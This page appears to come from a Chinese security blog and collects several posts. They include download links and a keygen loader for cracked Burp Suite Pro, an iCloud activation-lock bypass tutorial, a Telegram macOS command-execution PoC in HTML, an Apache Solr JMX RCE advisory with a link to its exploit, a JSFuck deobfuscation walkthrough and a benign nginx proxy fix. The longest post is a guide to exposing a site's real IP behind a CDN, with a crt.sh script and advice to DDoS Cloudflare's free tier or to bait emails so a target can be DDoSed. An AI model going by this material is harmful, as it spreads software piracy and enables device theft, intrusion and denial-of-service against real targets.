BurpSuite_pro_v2020.1汉化+破解版下载 安全工具
burpsuite pro v2020.1 破解后的license:
burpsuite pro v2020.1 汉化后的license界面:
注:所有的汉化破解教程都需要在你安装好Java环境的前提下,
即你在cmd命令行里面执行java和javac这两个命令会有输出。
推荐使用Java8即可适配burprsuite1.7或2.0+。
Java8 安装下载教程可以参考这个教程(里面提供了Oracle账号,下载jdk需要账号登录):
如何在64位Windows 10下安装java开发环境.pdf
有GitHub账号的可以顺手点个star,里面有很多关于burpsuite的插件和教程。
汉化破解教程:
先按照这个教程破解后 :https://mrxn.net/hacktools/Burp_Suite_Pro_v1_7_3_2_Loader_Keygen_Cracked_Share.html
再去执行 【创建桌面快捷方式.bat】即可在桌面创建汉化的快捷方式。
执行【Create-Desktop-Link.bat】即可在桌面创建英文原版的快捷方式。
burpsuite_pro_v2020.1.zip文件包含:
+--- burp-loader-keygen-2020_1.jar
+--- burpsuite pro 2020.1.png
+--- burpsuite pro 2020.1汉化.png
+--- BurpSuiteChs.jar
+--- burpsuite_pro_v2020.1.jar
+--- Burp_start.bat
+--- Burp_start_en.bat
+--- Create-Desktop-Link.bat
+--- Goescat-Macaron-Burp-suite.ico
+--- jython.jar
+--- 创建桌面快捷方式.bat
+--- 汉化破解说明.txt
下载地址:
http://tmp.link/f/5e53630ba1fdd
https://www79.zippyshare.com/v/d0pMoYPg/file.html
备用地址,如果速度慢需要代理:
https://mir.cr/1EFTTD3O
https://userscloud.com/w0760j7n2wct
https://uptobox.com/v65hsq7l6le8
burpsuite_pro_v2.1.07.jar及burp-loader-keygen-2_1_07.jar下载 安全工具
burpsuite破解成功后的license界面:
之前的老版本比如:
BurpSuite 1.7.32 Cracked 破解版[注册机]下载
在GitHub上的有关burpsuite项目,https://github.com/Mr-xn/BurpSuite-collections
因为被burpsuite官方向GitHub发了一个DMCA:https://github.com/github/dmca/blob/master/2020/01/2020-01-15-burpsuite.md
项目被封禁了一周,我后来多次联系GitHub,删除破解相关的文件,才放出来.
再此对GitHub表示抱歉,带来麻烦,同时也抱歉给burpsuite带来不好的影响。
初衷是为了方便渗透测试人员和安全研究人员使用,并不是商用,也不知道是不是有人商用被burp查到了,还是我的项目在GitHub上的star多了?反正放过出来后。star全部为0...
啥也不说了,保持初衷不变,继续给学习研究者使用,禁止商用!
下载:
https://drive.google.com/open?id=1n0eB-7nPK-hwJMpyz950egAKjq0yfW-B
https://www35.zippyshare.com/v/VKqEnLq5/file.html
https://www.mirrored.to/files/0HHQQTTU/
如有连接失效,请留言或者GitHub提issues。
Telegram(macOS v4.9.155353) 代码执行漏洞 PoC 业界新闻
Telegram 是啥不多说:看到了的赶紧更新吧。
详情看GitHub:https://github.com/Metnew/telegram-links-nsworkspace-open
给你发送一个超链接,包含恶意嵌套代码标签,导致命令执行。
POC 如下:
<html> </head> <!--<meta property="og:url" content="%A0file://google.com/bin/sh" /> Keybase--> <meta property="og:url" content="file://google.com/bin/sh" /> <meta property="og:type" content="article" /> <meta property="og:title" content="file://google.com/bin/sh ssh://google.com/x" /> <meta property="og:description" content="ssh://google.com/x file://google.com/bin/sh? " /> </head> </html>
解决nginx 反代 tomcat 应用不能获取到正确域名 技术文章
今天在帮朋友迁移部署tomcat应用得时候遇到了这么个问题:原来是在Windows服务器上直接使用tomcat部署到80端口的,新机器是Linux+宝塔面板,要是直接部署到80端口,其他网站或者nginx这类的就只能换端口,很是不方便,我就建议她使用nginx反代tomcat应用,那么问题就来了,我不是第一次使用nginx反代,但是之前都是反代后端的网络应用,不存在这些问题,使用宝塔添加了网站后,把应用上传到tomcat的webapps目录下,名称为shop,在网站设置启用tomcat,但是测试的时候就发现后端不能获得网站使用者正确的请求域名,获取的是本地的,http://127.0.0.1:8080/shop/xxxxxx,导致出现一些bug,返回的路径是本地的:
经过初略阅读+搜索应用源代码,找到了关键代码:
想吐槽一下这个程序员,不合格!!!这都9102年了,判断居然没有443???WTF!!!不让程序使用SSL???什么操作。。。
先说一下这个 request.getServerName() ,根据API上写的:
Reconstructs the URL the client used to make the request. The returned URL contains a protocol, server name, port number, and server path, but it does not include query string parameters.
也就是说, getRequestURL() 输出的是不带query string的路经(含协议 端口 server path等信息).
并且,还发现:
request.getScheme() //总是 http,而不是实际的http或https request.isSecure() //总是false(因为总是http) request.getRemoteAddr() //总是 nginx 请求的 IP,而不是用户的IP request.getRequestURL() //总是 nginx 请求的URL 而不是用户实际请求的 URL response.sendRedirect( 相对url ) //总是重定向到 http 上 (因为认为当前是 http 请求)
接下来就该批斗宝塔了!
看看默认的启用tomcat的配置里面没有 proxy_set_header Host $host;
最关键的就是没有这个,导致后端的Java程序的 request.getServerName() 获取不到正确的域名!
所以解决办法也简单,那就是在你的反代location里面加上 proxy_set_header Host $host; 后端就可以正确获取到当前的浏览器域名了。完事儿。
最后说一下,如果后端不是我上面说的那个不合格的程序员写的没有判断HTTPS的话,只需要在location里面添加 proxy_set_header X-Forwarded-Proto $scheme; 即可正确处理HTTPS了。
日常踩坑记录。。。
参考:
https://www.cnblogs.com/interdrp/p/4881785.html
https://blog.csdn.net/tpkey/article/details/18550039
Shodan 庆祝成立10周年,会员优惠1$ 资源分享
不多说,如果你搞渗透测试或者信安,这些东西不知道Shodan的话,就不用看了。
今天在Shodan 的官方twitter看到,他们的活动通知,
在UTC时间23号一天里只需要1$即可购买成为会员,算成北京时间就是明天早上八点结束。
可以使用PayPal或者是信用卡支付,你也可以找人代付,但是这个只有20次下载,但是你可以不用下载,自己写脚本用API查询,导出数据。活动地址,shodan.io/store/member 快上车,其他时间只有一年一度的黑五优惠,是5$,100次。
最新iCloudBypass一键移除iphone 5s — iphone x 的ID锁 业界新闻
注:此方法适用于破解忘记ID密码的设备,支持iphone 5s — iphone x的全版本系统设备。
目前只能在Mac os系统环境下执行 (黑苹果可以而安装虚拟机则无法使用)
iphone 5s — iphone x
图文简要教程
使用checkra1in工具越狱:
手机连电脑,点start——next,start,跟着提示手动进DFU就好了
https://github.com/crazymind90/iCloudBypassCA
如果不能安装,提示未知来源之类等,解决方法:登录管理员用户,从 Apple 菜单中选取“系统偏好设置”选取“安全性与隐私”打开,选择仍要打开,(勾选上任何来源,就不会显示通知了,但是不建议这么做!)不会设置的参考:https://support.apple.com/zh-cn/HT202491 ,还不会就不要折腾了。。。
安装后打开安装iCloudbypass后打开如图:
-
复制上图上的1所指小框框的内容,粘贴,回车
-
待跑完代码后,复制上图上的2所指小框框的内容,粘贴,回车
-
最后点击“Move iCloud to Trash”即可
https://youtu.be/qSXzgrVhWgE
视频下载:
链接: https://pan.baidu.com/s/1BAzN0jw3iYFMpxHBSCIv5A 提取码: mrxn
最后:
如果没有忘记ID密码的设备,不要自己加难度,强行试验,根本没有必要!
此工具为第三方工具,理论上是有风险的,使用需谨慎。
CVE-2019-12409/Apache Solr由于错误配置JMX RMI导致远程代码执行漏洞 业界新闻
0x1 背景
Solr是apache的顶级开源项目,它是使用java开发 ,基于lucene的全文检索服务器。
Solr仅新版本 8.1.1, 8.2.0受到该漏洞影响,Solr用户不应该把自身的 Solr 集群暴露于公网之中。
在Linux 下的环境下的Apache Solr 8.1.1和8.2.0版本中默认启用不安全配置(ENABLE_REMOTE_JMX_OPTS="true"),如果开启JMX监听服务,可能导致远程代码执行的风险,建议使用Apache Solr的用户尽快更新到无漏洞版本或
由于 Solr 新版默认启动时开启JMX服务,如果你的服务器是在公网上,请立即做好环境网络配置自查工作,或关闭JMX相关功能。
0x2 漏洞详情
Java ManagementExtensions(JMX)是一种Java技术,为管理和监视应用程序、系统对象、设备(如打印机)和面向服务的网络提供相应的工具。
JMX 作为 Java的一种Bean管理机制,如果JMX服务端口暴露,那么远程攻击者可以让该服务器远程加载恶意的Bean文件,随着Bean的滥用导致远程代码执行。
CVE-2019-12409漏洞:在Linux 下的环境下的Apache Solr 8.1.1和8.2.0版本存在默认不安全配置(ENABLE_REMOTE_JMX_OPTS="true"),通过该配置开启RMI服务(默认监听在TCP 18983端口)后,攻击者可利用网上公开的JMX漏洞利用工具进行远程代码执行(RCE)攻击,从而获取服务器权限。
1.启动一个可以被用于远程类加载的 MLet web服务
2.使用JMX服务使目标服务器远程加载恶意类
3.调用恶意 Bean 实现代码执行
0x3 漏洞证明
0x4 修复&缓解措施
临时缓解措施:
本次官方更新主要更新配置选项ENABLE_REMOTE_JMX_OPTS为false,因此在不影响业务系统正常运行的情况下,可以直接修改Apache Solr的bin目录里的solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS字段值为false,修改完配置需要重启服务才能生效。
附漏洞POC利用地址:
https://github.com/jas502n/CVE-2019-12409
参考地址:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12409
https://nosec.org/home/detail/2544.html
https://www.n0tr00t.com/2015/04/17/JMX-RMI-Exploit-Demo.html
https://github.com/mogwailabs/mjet
配合chrome浏览器console解密一段JSFuck代码["\x66\x69\x6c\x74\x65\x72"] 技术文章
在测试某个项目的时候,发现一段JavaScript代码,省略不重要的部分如下:
// 原内容如下,只知道有个正则
['mmh']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['mmh'] + [])[
"\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'][
'\x61\x70\x70\x6c\x79'](null,
"33s102Y117y110O99L116H105n111u110Z40g41U123u102m117c110M99m116T105y111d110"
'\x73\x70\x6c\x69\x74')))('mmh');
// 在JavaScript中对于\x66这种开头的,\x代表这是一个16进制,直接在console里面打印出来就ok
// console.log('\x66\x69\x6c\x74\x65\x72') => filter
// 然后依次打印所有的类似字节即可得到如下转码后的JavaScript代码
// 如果你到这里不知道如何下手的话,怎么办?搜索啊!Google搜索以下 XXXX是什么 就有结果了
// 或者把全部\x66这种解密后得到的相关字符串去搜索就有结果了
// 下面看一下jsfuck对照表,然后解密
// false => ![]
// true => !![]
// undefined => [][[]]
// NaN => +[![]]
// 0 => +[]
// 1 => +!+[]
// 2 => !+[]+!+[]
// 10 => [+!+[]]+[+[]]
// Array => []
// Number => +[]
// String => []+[]
// Boolean => ![]
// Function => []["filter"]
// eval => []["filter"]"constructor"()
// window => []["filter"]["constructor"]("return this")()
// 解码后的代码如下,为了节省字符,使用mrxn123代替代码中的超长字符串
['mmh']["filter"]["constructor"](((['mmh'] + [])["constructor"]['fromCharCode']'apply'))('mmh');
// 根据jsfuck对照表,我们去掉mmh,这样就是熟悉的原滋原味的jsfuck格式的代码了
[]["filter"]["constructor"]((([] + [])["constructor"]['fromCharCode']'apply'))();
// 根据eval对照[]["filter"]"constructor"(),我们只需要把code部分代码直接console.log()出来就好
console.log(((([] + [])["constructor"]['fromCharCode']'apply')));
// 输出:{
// 同样的姿势将开始用mrxn123替换掉的字符串替换回去,回车,OK!JavaScript源码就出现在控制台了
Burp Suite Professional 2.1.05及burp-loader-keygen-2_1_05.jar下载 安全工具
其实Burp Suite Professional 2.1.05及burp-loader-keygen-2_1_05.jar出来好几天了,差不多就在burp官方portswigger 5号更新后第三天就流出来了,先上一张最新版的截图吧!必须要有图,哈哈
但是最近很忙没有第一时间更新,知道的,要过年了!努力加班挣过年钱啊,没钱的年就和难过了啊!最近国内环境也不好,整个大环境也不太好,各方面的都收紧了。不可能暴富,那就只有积累了,不管是你的长辈积累还是自己积累都需要时间,见过娱乐圈内好几个暴富的都进去了!(Helen 进去了,他其实还不算暴富。。。)
子曰:君子爱财,取之有道;贞妇爱色,纳之以礼。——《增广贤文》
哔哔这么多只是想说:做个遵纪守法的好P民!不要信什么鬼闷声发大财,这就是赌博,简直是豪赌!如果你的运气好的爆棚自己搞,在下佩服,兄嘚牛逼!别后悔就行!
好了,言归正传,本次更新根据官网的说明,主要有以下几点:
1.支持在扫描时使用内嵌的Chromium 浏览器,一边支持使用JavaScript动态生成渲染的数据页面。
2.支持JavaScript的表单单击提交事件等等
3.burp内置的JRE升级到了Java12
但是也有很多的注意事项:
1.性能差,在接下来慢慢优化
2.支持链接和表单的JavaScript点击事件
3.接收XHR异步请求但是不会审查
4.在不和服务器交互的情况下,不能正确处理某些DOM
5.不支持Frames 和iframes
6.不支持文件上传
总之,不推荐使用,如果希望尝鲜,就看下面的:
说一下最新版的Burp Suite Professional 2.1.05如何使用。
首先,所有的破解、汉化或使用burpsuite都是在你配置好了Java环境的前提下!!!推荐使用Java8比较稳定。
不知道如何配置Java环境的,GitHub项目里有一份如何在64位Windows 10下安装java开发环境的教程,请按照操作,其他的系统自行Google或者是多吉搜索(又名狗狗搜索,https://www.dogedoge.com/),百度搜教程真的是百毒。。。
在配置好了Java环境后,就可以开始破解burp、汉化、创建快捷方式等等操作。这些都有教程,具体的请在我的GitHub项目查看,项目在这篇文章已经说过:BurpSuite Pro破解版[BurpSuite Cracked version]+汉化脚本(windows)+常用插件(sqlmap.jar,bypasswaf.jar等)分享
Burp Suite Professional 2.1.05 2.1.04 1.7.37都可以在项目的release下载到,但是release默认没有打包插件和书籍这些。
大家可以关注我GitHub,star,fllow我!拉一波票 (~o ̄3 ̄)~,我一般是最新更新GitHub,博客最后看心情更新。
寻找CDN背后的真实IP方式总结之2019完结篇 技术文章
注:总共两篇文章,第一篇文章来自信安,第二篇来自 WhITECat。我这里只是总结一下,方便自己查看,不用每次都去翻好几篇文章,如果两位原作不允许,随时删除。
第一篇:绕过 CDN 寻找真实 IP 地址的各种姿势
个人觉得,绕过 CDN 去寻找主机的真实 ip,更容易能寻找到企业网络的薄弱地带,所以 Bypass CDN 也就变成了至关重要的一点。
0x01 常见 Bypass 方法
域名搜集
由于成本问题,可能某些厂商并不会将所有的子域名都部署 CDN,所以如果我们能尽量的搜集子域名,或许可以找到一些没有部署 CDN 的子域名,拿到某些服务器的真实 ip/ 段
然后关于子域名搜集的方式很多,就不一一介绍了,我平时主要是从这几个方面搜集子域名:
1、SSL 证书
2、爆破
3、Google Hacking
4、同邮箱注册人
4、DNS 域传送
5、页面 JS 搜集
6、网络空间引擎
工具也有很多厉害的,平时我一般使用 OneForALL + ESD + JSfinder 来进行搜集,(ESD 可以加载 layer 的字典,很好用)
查询 DNS 历史解析记录
常常服务器在解析到 CDN 服务前,会解析真实 ip,如果历史未删除,就可能找到
常用网站:
http://viewdns.info/
https://x.threatbook.cn/
http://www.17ce.com/
https://dnsdb.io/zh-cn/
https://securitytrails.com/
http://www.ip138.com/
https://github.com/vincentcox/bypass-firewalls-by-DNS-history
MX 记录(邮件探测)
这个很简单,如果目标系统有发件功能,通常在注册用户/找回密码等地方,通过注册确认、验证码等系统发来的邮件进行查看邮件原文即可查看发件IP地址。
SSL 证书探测
我们可以利用空间引擎进行 SSL 证书探测
443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names:www.baidu.com
再放一个搜集证书的网站:
https://crt.sh
一个小脚本,可以快速搜集证书
-- coding: utf-8 --
@Time : 2019-10-08 22:51
@Author : Patrilic
@FileName: SSL_subdomain.py
@Software: PyCharm
import requests
import re
TIME_OUT = 60
def get_SSL(domain):
domains = []
url = 'https://crt.sh/?q=%25.{}'.format(domain)
response = requests.get(url,timeout=TIME_OUT)
# print(response.text)
ssl = re.findall("<TD>(.*?).{}</TD>".format(domain),response.text)
for i in ssl:
i += '.' + domain
domains.append(i)
print(domains)
if name == 'main':
get_SSL("baidu.com")
还有一种方式,就是搜集 SSL 证书 Hash,然后遍历 ip 去查询证书 hash,如果匹配到相同的,证明这个 ip 就是那个 域名同根证书的服务器真实 ip
简单来说,就是遍历 0.0.0.0/0:443,通过 ip 连接 https 时,会显示证书
当然,也可以用 censys 等引擎
偏远地区服务器访问
在偏远地区的服务器访问时,可能不会访问到 CDN 节点,而是直接访问服务器真实 ip
所以我们可以搞一个偏远地区的代理池,来访问目标域名,有概率就可以拿到真实 ip
也就是平常说的多地 Ping
favicon_hash 匹配
利用 shodan 的 http.favicon.hash 语法,来匹配 icon 的 hash 值, 直接推:
https://github.com/Ridter/get_ip_by_ico/blob/master/get_ip_by_ico.py
CloudFlare Bypass
免费版的 cf,我们可以通过 DDOS 来消耗对方的流量,只需要把流量打光,就会回滚到原始 ip
还有利用 cloudflare 的改 host 返回示例:
https://blog.detectify.com/2019/07/31/bypassing-cloudflare-waf-with-the-origin-server-ip-address/
里面给了详细的介绍,我们可以通过 HOST 来判断是否是真实 ip, 具体看文章即可
奇特的 ping
比如可能有些地方,使用的 CDN 都是以 www.xxx.edu.cn,例如 www.cuit.edu.cn,www.jwc.cuit.edu.cn
可能去掉前缀的 www,就可能绕过 CDN 了,猜测应该是类似于 Apache VirtualHost, 可参考
https://httpd.apache.org/docs/2.4/en/vhosts/examples.html
例如对WWW域名和根域名(不带WWW)分别进行PING,结果有可能不同。
其实是 ping 了 www.xxx.xxx.cn 和 xxx.xxx.cn,这样就可以绕过 CDN 的检测。
利用老域名
在换新域名时,常常将 CDN 部署到新的域名上,而老域名由于没过期,可能未使用 CDN,然后就可以直接获取服务器真实 ip。
例如 patrilic.top > patrilic.com
域名更新时,可能老域名同时解析到真实服务器,但是没有部署 CDN
这个可以通过搜集域名备案的邮箱去反查,可能会有意外收获
暴力匹配
找到目标服务器 IP 段后,可以直接进行暴力匹配 ,使用 masscan 扫描 HTTP banner,然后匹配到目标域名的相同 banner
最后是 DDos/ 社工 CDN 平台等
0x02 其他方法
phpinfo.php 这类探针
ssrf,文件上传等漏洞
略..
第二篇文章:“最后”的Bypass CDN 查找网站真实IP
注:其实与第一篇有重复的的地方,请自行斟酌查看。
0x00起源~
查找网站真实IP过程中我们会经常用到一些Bypass CDN的手法,而Bypass CDN的常见姿势,之前看到过“信安之路”的某位大佬总结的挺好的,于是和小伙伴们又专门的去学习了一波,然后决定将学习心得归结于文字,以便于记录和复习。
0x01判断是否存在CDN
查找网站真实IP的第一步是先查看当前站点是否部署了CDN,而较为简单快捷的方式就是通过本地Nslookup查询目标站点的DNS记录,若存在CDN,则返回CDN服务器的地址,若不存在CDN,则返回的单个IP地址,我们认为它就是目标站点的真实IP。
除了使用nslookup,还可以通过第三方站点的DNS解析记录或者多地ping的方式去判断是否存在CDN。判断CDN只是个开始,不加赘述。。。
小伙伴-胡大毛的www法
以前用CDN的时候有个习惯,只让WWW域名使用cdn,秃域名不适用,为的是在维护网站时更方便,不用等cdn缓存。所以试着把目标网站的www去掉,ping一下看ip是不是变了,您别说,这个方法还真是屡用不爽。
小伙伴-刘正经的二级域名法
目标站点一般不会把所有的二级域名放cdn上,比如试验性质的二级域名。Google site一下目标的域名,看有没有二级域名出现,挨个排查,确定了没使用cdn的二级域名后,本地将目标域名绑定到同ip,能访问就说明目标站与此二级域名在同一个服务器上。不在同一服务器也可能在同C段,扫描C段所有开80端口的ip,挨个试。如果google搜不到也不代表没有,我们拿常见的二级域名构造一个字典,猜出它的二级域名。比如mail、cache、img。
查询子域名工具:layer子域名挖掘机 subdomin
扫描c段好用工具:zmap(https://www.cnblogs.com/China-Waukee/p/9596790.html)
还是“刘正经”的nslookup法
查询域名的NS记录,其域名记录中的MX记录,TXT记录等很有可能指向的是真实ip或同C段服务器。
注:域名解析--什么是A记录、别名记录(CNAME)、MX记录、TXT记录、NS记录(https://www.22.cn/help_34.html)
小伙伴-胡小毛的工具法
这个工具http://toolbar.netcraft.com据说会记录网站的ip变化情况,通过目标网站的历史ip地址就可以找到真实ip。没亲自测试,想必不是所有的网站都能查到。
例:http://toolbar.netcraft.com/site_report?url=http://www.waitalone.cn
小伙伴-狄弟弟的目标敏感文件泄露
也许目标服务器上存在一些泄露的敏感文件中会告诉我们网站的IP,另外就是如phpinfo之类的探针。
小伙伴-匿名H的墙外法
很多国内的CDN没有节点对国外服务,国外的请求会直接指向真实ip。有人说用国外NS和或开国外VPN,但这样成功率太低了。我的方法是用国外的多节点ping工具,例如just-ping,全世界几十个节点ping目标域名,很有可能找到真实ip。
域名:http://www.just-ping.com/
小伙伴-不靠谱的从CDN入手法
无论是用社工还是其他手段,反正是拿到了目标网站管理员在CDN的账号了,此时就可以自己在CDN的配置中找到网站的真实IP了。此法着实适用于“小伙伴-不靠谱”使用。
还是“不靠谱”的钓鱼法
不管网站怎么CDN,其向用户发的邮件一般都是从自己服务器发出来的。以wordpress为例,假如我要报复一个来我这捣乱的坏蛋,坏蛋使用了 CDN,我要找到它的真实ip以便DDOS他。我的方法是在他博客上留言,再自己换个名回复自己,然后收到他的留言提醒邮件,就能知道发邮件的服务器ip 了。如果他没开提醒功能,那就试试他是不是开启了注册功能,wordpress默认是用邮件方式发密码的。
0x03“最后”的总结
小伙伴“最后”来了一波总结:
百因必有果,你的报应就是我~o~
万剑归宗不是火,万法合一才是果~o~
小伙伴们总结了一波又一波方法,“最后”表示不太行,方法很多,每一个看起来都很实用,但实战告诉我们,只有把这些方法都灵活贯通的结合使用才能达到最大的效果。“最后”以胡大毛的www法结合查找网站历史DNS解析记录的方法查找某个站点的真实IP的举例如下:
某站点www.xxx.com的当前解析显示有多个IP,但历史解析仅有一个IP,可以猜测该IP可能是真实IP。
“最后”认为除了需要将方法结合使用之外,辅助工具也是不可缺少的,于是又整理了一波常用的工具和查询平台如下:
1、查询SSL证书或历史DNS记录
https://censys.io/certificates/ ###通过SSL证书查询真实IP(推荐)
https://site.ip138.com/ ###DNS、IP等查询
http://ping.chinaz.com/ ###多地ping
http://ping.aizhan.com/ ###多地ping
https://myssl.com/dns_check.html#dns_check ###DNS查询
https://securitytrails.com/ ### DNS查询
https://dnsdb.io/zh-cn/ ###DNS查询
https://x.threatbook.cn/ ###微步在线
http://toolbar.netcraft.com/site_report?url= ###在线域名信息查询
http://viewdns.info/ ###DNS、IP等查询
https://tools.ipip.net/cdn.php ###CDN查 询IP
2、相关工具
子域名查询工具:layer子域名挖掘机,dirbrute,Oneforal(下载链接:https://github.com/shmilylty/OneForAll,推荐)
站点banner信息获取:Zmap,masscan等。
参考链接
https://github.com/shmilylty/OneForAll
https://github.com/FeeiCN/ESD
https://github.com/Threezh1/JSFinder
https://github.com/AI0TSec/blog/issues/8
https://www.4hou.com/tools/8251.html
https://www.freebuf.com/sectool/112583.html